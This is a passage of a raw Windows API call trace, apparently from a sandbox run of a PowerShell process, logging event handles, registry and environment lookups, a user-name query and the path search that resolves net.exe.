[0069.921] CoTaskMemFree (pv=0x230440) [0069.924] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.924] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.924] CoTaskMemFree (pv=0x230440) [0069.929] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.929] CoTaskMemFree (pv=0x230440) [0069.931] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x344 [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c8 [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394 [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398 [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x39c [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0 [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4 [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a8 [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ac [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc [0069.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390 [0069.935] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.935] CoTaskMemFree (pv=0x230440) [0069.940] SetEvent (hEvent=0x394) returned 1 [0069.940] SetEvent (hEvent=0x344) returned 1 [0069.940] SetEvent (hEvent=0x3c8) returned 1 [0069.941] SetEvent (hEvent=0x36c) returned 1 [0069.941] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4 [0069.944] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.944] CoTaskMemFree (pv=0x230440) [0069.945] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d678 | out: phkResult=0x12d678*=0x3b8) returned 0x0 [0069.945] RegQueryValueExW (in: hKey=0x3b8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12d5fc, lpData=0x0, lpcbData=0x12d5f8*=0x0 | out: lpType=0x12d5fc*=0x0, lpData=0x0, lpcbData=0x12d5f8*=0x0) returned 0x2 [0083.821] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0083.827] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0083.828] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12d7c0 | out: lpConsoleScreenBufferInfo=0x12d7c0) returned 1 [0083.835] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0083.835] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x12d7c0 | out: lpConsoleScreenBufferInfo=0x12d7c0) returned 1 [0083.836] ReadFile (in: hFile=0xe4, lpBuffer=0x2cfd2d0, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x12d638, lpOverlapped=0x0 | out: lpBuffer=0x2cfd2d0*, lpNumberOfBytesRead=0x12d638*=0x6, lpOverlapped=0x0) returned 1 [0083.842] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0083.843] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x12d7c0 | out: lpConsoleScreenBufferInfo=0x12d7c0) returned 1 [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3b8 [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x350 [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x358 [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x354 [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x35c [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x360 [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c0 [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x370 [0083.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x374 [0083.846] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378 [0083.846] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c [0083.846] SetEvent (hEvent=0x358) returned 1 [0083.846] SetEvent (hEvent=0x3b8) returned 1 [0083.846] SetEvent (hEvent=0x350) returned 1 [0083.846] SetEvent (hEvent=0x34c) returned 1 [0083.846] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0083.847] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d678 | out: phkResult=0x12d678*=0x388) returned 0x0 [0083.847] RegQueryValueExW (in: hKey=0x388, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12d5fc, lpData=0x0, lpcbData=0x12d5f8*=0x0 | out: lpType=0x12d5fc*=0x0, lpData=0x0, lpcbData=0x12d5f8*=0x0) returned 0x2 [0083.958] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0083.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0083.959] CoTaskMemFree (pv=0x230440) [0083.964] SetEvent (hEvent=0x338) returned 1 [0083.965] CoTaskMemAlloc (cb=0x804) returned 0x1b862ae0 [0083.966] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b862ae0, nSize=0x12d848 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d848) returned 0x1 [0083.966] CoTaskMemFree (pv=0x1b862ae0) [0083.966] CoTaskMemAlloc (cb=0x204) returned 0x282e90 [0083.966] GetUserNameW (in: lpBuffer=0x282e90, pcbBuffer=0x12d888 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d888) returned 1 [0083.967] CoTaskMemFree (pv=0x282e90) [0083.968] ReportEventW (hEventLog=0x1b930008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fcd358*="Stopped", lpRawData=0x2fcd0e8) returned 1 [0083.969] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0083.974] CoGetContextToken (in: pToken=0x12f410 | out: pToken=0x12f410) returned 0x0 [0083.974] CObjectContext::QueryInterface () returned 0x0 [0083.974] CObjectContext::GetCurrentThreadType () returned 0x0 [0083.974] Release () returned 0x0 [0083.976] CoGetContextToken (in: pToken=0x12efe0 | out: pToken=0x12efe0) returned 0x0 [0083.976] CObjectContext::QueryInterface () returned 0x0 [0083.976] CObjectContext::GetCurrentThreadType () returned 0x0 [0083.976] Release () returned 0x0 [0083.979] CoGetContextToken (in: pToken=0x12efe0 | out: pToken=0x12efe0) returned 0x0 [0083.979] CObjectContext::QueryInterface () returned 0x0 [0083.979] CObjectContext::GetCurrentThreadType () returned 0x0 [0083.979] Release () returned 0x0 [0083.990] CoGetContextToken (in: pToken=0x12efe0 | out: pToken=0x12efe0) returned 0x0 [0083.990] CObjectContext::QueryInterface () returned 0x0 [0083.991] CObjectContext::GetCurrentThreadType () returned 0x0 [0083.991] Release () returned 0x0 [0084.022] CoGetContextToken (in: pToken=0x12efd0 | out: pToken=0x12efd0) returned 0x0 [0084.022] CObjectContext::QueryInterface () returned 0x0 [0084.022] CObjectContext::GetCurrentThreadType () returned 0x0 [0084.022] Release () returned 0x0 [0084.025] CoUninitialize () Thread: id = 9 os_tid = 0x6dc Thread: id = 10 os_tid = 0x408 Thread: id = 11 os_tid = 0x754 Thread: id = 12 os_tid = 0x138 Thread: id = 13 os_tid = 0x644 [0063.731] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0067.937] CloseHandle (hObject=0x330) returned 1 [0067.938] CloseHandle (hObject=0x13) returned 1 [0067.938] CloseHandle (hObject=0xf) returned 1 [0067.939] RegCloseKey (hKey=0x31c) returned 0x0 [0067.939] RegCloseKey (hKey=0x318) returned 0x0 [0067.939] RegCloseKey (hKey=0x314) returned 0x0 [0067.939] LocalFree (hMem=0x23a7e0) returned 0x0 [0067.939] RegCloseKey (hKey=0x344) returned 0x0 [0067.939] LocalFree (hMem=0x23a810) returned 0x0 [0069.752] RegCloseKey (hKey=0x3c4) returned 0x0 [0069.753] RegCloseKey (hKey=0x38c) returned 0x0 [0069.753] RegCloseKey (hKey=0x388) returned 0x0 [0069.753] RegCloseKey (hKey=0x384) returned 0x0 [0069.754] RegCloseKey (hKey=0x380) returned 0x0 [0069.754] RegCloseKey (hKey=0x37c) returned 0x0 [0069.754] RegCloseKey (hKey=0x378) returned 0x0 [0069.755] RegCloseKey (hKey=0x374) returned 0x0 [0069.755] RegCloseKey (hKey=0x370) returned 0x0 [0069.755] RegCloseKey (hKey=0x3c0) returned 0x0 [0069.756] RegCloseKey (hKey=0x360) returned 0x0 [0069.756] RegCloseKey (hKey=0x35c) returned 0x0 [0069.756] RegCloseKey (hKey=0x358) returned 0x0 [0069.756] RegCloseKey (hKey=0x354) returned 0x0 [0069.757] RegCloseKey (hKey=0x350) returned 0x0 [0069.757] RegCloseKey (hKey=0x34c) returned 0x0 [0069.757] RegCloseKey (hKey=0x348) returned 0x0 [0069.758] RegCloseKey (hKey=0x330) returned 0x0 [0069.758] RegCloseKey (hKey=0x3bc) returned 0x0 [0069.758] RegCloseKey (hKey=0x318) returned 0x0 [0069.758] RegCloseKey (hKey=0x314) returned 0x0 [0069.758] RegCloseKey (hKey=0x3b8) returned 0x0 [0069.759] RegCloseKey (hKey=0x3b4) returned 0x0 [0069.759] RegCloseKey (hKey=0x390) returned 0x0 [0069.759] RegCloseKey (hKey=0x3cc) returned 0x0 [0069.760] RegCloseKey (hKey=0x3ac) returned 0x0 [0069.760] RegCloseKey (hKey=0x3a8) returned 0x0 [0069.760] RegCloseKey (hKey=0x3a4) returned 0x0 [0069.761] RegCloseKey (hKey=0x3a0) returned 0x0 [0069.761] RegCloseKey (hKey=0x39c) returned 0x0 [0069.761] RegCloseKey (hKey=0x398) returned 0x0 [0069.762] RegCloseKey (hKey=0x394) returned 0x0 [0069.762] RegCloseKey (hKey=0x36c) returned 0x0 [0069.762] RegCloseKey (hKey=0x3c8) returned 0x0 [0069.762] RegCloseKey (hKey=0x344) returned 0x0 [0083.551] CloseHandle (hObject=0x17) returned 1 [0083.571] CloseHandle (hObject=0x1b) returned 1 [0083.571] CloseHandle (hObject=0x13) returned 1 [0083.571] CloseHandle (hObject=0xf) returned 1 [0083.572] RegCloseKey (hKey=0x3b8) returned 0x0 [0083.981] LocalFree (hMem=0x230330) returned 0x0 [0083.981] LocalFree (hMem=0x230220) returned 0x0 [0083.990] DeregisterEventSource (hEventLog=0x1b930008) returned 1 [0084.009] RegCloseKey (hKey=0x388) returned 0x0 [0084.009] CloseHandle (hObject=0x380) returned 1 [0084.009] CloseHandle (hObject=0x37c) returned 1 [0084.010] CloseHandle (hObject=0x378) returned 1 [0084.010] CloseHandle (hObject=0x374) returned 1 [0084.010] CloseHandle (hObject=0x370) returned 1 [0084.010] CloseHandle (hObject=0x3c0) returned 1 [0084.011] CloseHandle (hObject=0x360) returned 1 [0084.011] CloseHandle (hObject=0x35c) returned 1 [0084.011] CloseHandle (hObject=0x354) returned 1 [0084.011] CloseHandle (hObject=0x358) returned 1 [0084.012] CloseHandle (hObject=0x34c) returned 1 [0084.012] CloseHandle (hObject=0x3b4) returned 1 [0084.012] CloseHandle (hObject=0x390) returned 1 [0084.013] CloseHandle (hObject=0x3cc) returned 1 [0084.013] CloseHandle (hObject=0x3ac) returned 1 [0084.013] CloseHandle (hObject=0x3a8) returned 1 [0084.013] CloseHandle (hObject=0x3a4) returned 1 [0084.014] CloseHandle (hObject=0x3a0) returned 1 [0084.014] CloseHandle (hObject=0x39c) returned 1 [0084.014] CloseHandle (hObject=0x398) returned 1 [0084.014] CloseHandle (hObject=0x394) returned 1 [0084.015] CloseHandle (hObject=0x36c) returned 1 [0084.015] CloseHandle (hObject=0x3c8) returned 1 [0084.015] CloseHandle (hObject=0x344) returned 1 [0084.015] CloseHandle (hObject=0x350) returned 1 [0084.016] CloseHandle (hObject=0x3b8) returned 1 [0084.016] CloseHandle (hObject=0x1b) returned 1 [0084.016] CloseHandle (hObject=0x334) returned 1 [0084.017] UnmapViewOfFile (lpBaseAddress=0x2350000) returned 1 [0084.017] UnmapViewOfFile (lpBaseAddress=0x27f0000) returned 1 [0084.018] CloseHandle (hObject=0x17) returned 1 [0084.018] CloseHandle (hObject=0x13) returned 1 [0084.019] CloseHandle (hObject=0x338) returned 1 [0084.019] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0084.019] CloseHandle (hObject=0x2fc) returned 1 [0084.020] CloseHandle (hObject=0x340) returned 1 Thread: id = 14 os_tid = 0x570 [0069.957] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0069.962] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0069.968] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.968] CoTaskMemFree (pv=0x230440) [0069.970] VirtualQuery (in: lpAddress=0x1c79de80, lpBuffer=0x1c79ed40, dwLength=0x30 | out: lpBuffer=0x1c79ed40*(BaseAddress=0x1c79d000, AllocationBase=0x1be10000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0069.976] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.976] CoTaskMemFree (pv=0x230440) [0069.980] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.980] CoTaskMemFree (pv=0x230440) [0069.984] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.984] CoTaskMemFree (pv=0x230440) [0069.996] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.996] CoTaskMemFree (pv=0x230440) [0069.999] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0069.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0069.999] CoTaskMemFree (pv=0x230440) [0070.001] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.001] CoTaskMemFree (pv=0x230440) [0070.007] VirtualQuery (in: lpAddress=0x1c79e130, lpBuffer=0x1c79eff0, dwLength=0x30 | out: lpBuffer=0x1c79eff0*(BaseAddress=0x1c79e000, AllocationBase=0x1be10000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0070.008] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.008] CoTaskMemFree (pv=0x230440) [0070.011] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.012] CoTaskMemFree (pv=0x230440) [0070.012] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.012] CoTaskMemFree (pv=0x230440) [0070.014] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.014] CoTaskMemFree (pv=0x230440) [0070.019] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.019] CoTaskMemFree (pv=0x230440) [0070.088] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.088] CoTaskMemFree (pv=0x230440) [0070.091] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.091] CoTaskMemFree (pv=0x230440) [0070.093] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.093] CoTaskMemFree (pv=0x230440) [0070.096] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.096] CoTaskMemFree (pv=0x230440) [0070.098] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.098] CoTaskMemFree (pv=0x230440) [0070.100] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.100] CoTaskMemFree (pv=0x230440) [0070.102] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.102] CoTaskMemFree (pv=0x230440) [0070.126] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.126] CoTaskMemFree (pv=0x230440) [0070.219] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.219] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0070.219] CoTaskMemFree (pv=0x230440) [0070.224] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.224] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0070.224] CoTaskMemFree (pv=0x230440) [0070.237] CoTaskMemAlloc (cb=0x20e) returned 0x1b831690 [0070.237] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b831690 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0070.237] CoTaskMemFree (pv=0x1b831690) [0070.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0070.243] SetErrorMode (uMode=0x1) returned 0x1 [0070.246] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.ps1", lpFindFileData=0x1c79e060 | out: lpFindFileData=0x1c79e060*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0070.247] SetErrorMode (uMode=0x1) returned 0x1 [0070.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0070.247] SetErrorMode (uMode=0x1) returned 0x1 [0070.247] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.psm1", lpFindFileData=0x1c79e060 | out: lpFindFileData=0x1c79e060*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0070.247] SetErrorMode (uMode=0x1) returned 0x1 [0070.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0070.248] SetErrorMode (uMode=0x1) returned 0x1 [0070.248] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.psd1", lpFindFileData=0x1c79e060 | out: lpFindFileData=0x1c79e060*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0070.248] SetErrorMode (uMode=0x1) returned 0x1 [0070.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0070.248] SetErrorMode (uMode=0x1) returned 0x1 [0070.248] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.COM", lpFindFileData=0x1c79e060 | out: lpFindFileData=0x1c79e060*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0070.249] SetErrorMode (uMode=0x1) returned 0x1 [0070.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c79dec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0070.249] SetErrorMode (uMode=0x1) returned 0x1 [0070.249] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\net.EXE", lpFindFileData=0x1c79e060 | out: lpFindFileData=0x1c79e060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bcb61, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x251bcb61, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xeb4255c0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xda00, dwReserved0=0x0, dwReserved1=0x0, cFileName="net.exe", cAlternateFileName="")) returned 0x2d8ac0 [0070.250] FindNextFileW (in: hFindFile=0x2d8ac0, lpFindFileData=0x1c79e070 | out: lpFindFileData=0x1c79e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bcb61, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x251bcb61, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xeb4255c0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xda00, dwReserved0=0x0, dwReserved1=0x0, cFileName="net.exe", cAlternateFileName="")) returned 0 [0070.251] FindClose (in: hFindFile=0x2d8ac0 | out: hFindFile=0x2d8ac0) returned 1 [0070.251] SetErrorMode (uMode=0x1) returned 0x1 [0070.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\net.exe", nBufferLength=0x105, lpBuffer=0x1c79e180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\net.exe", lpFilePart=0x0) returned 0x1b [0070.252] SetErrorMode (uMode=0x1) returned 0x1 [0070.252] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c79e390 | out: lpFileInformation=0x1c79e390*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x251bcb61, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x251bcb61, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xeb4255c0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xda00)) returned 1 [0070.253] SetErrorMode (uMode=0x1) returned 0x1 [0070.255] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.255] CoTaskMemFree (pv=0x230440) [0070.257] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.257] CoTaskMemFree (pv=0x230440) [0070.264] CoTaskMemAlloc (cb=0x104) returned 0x230440 [0070.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x230440, nSize=0x80 | out: lpBuffer="") returned 0x0 [0070.264] CoTaskMemFree (pv=0x230440) [0070.274] CoTaskMemAlloc (cb=0x104) returned 0x230440 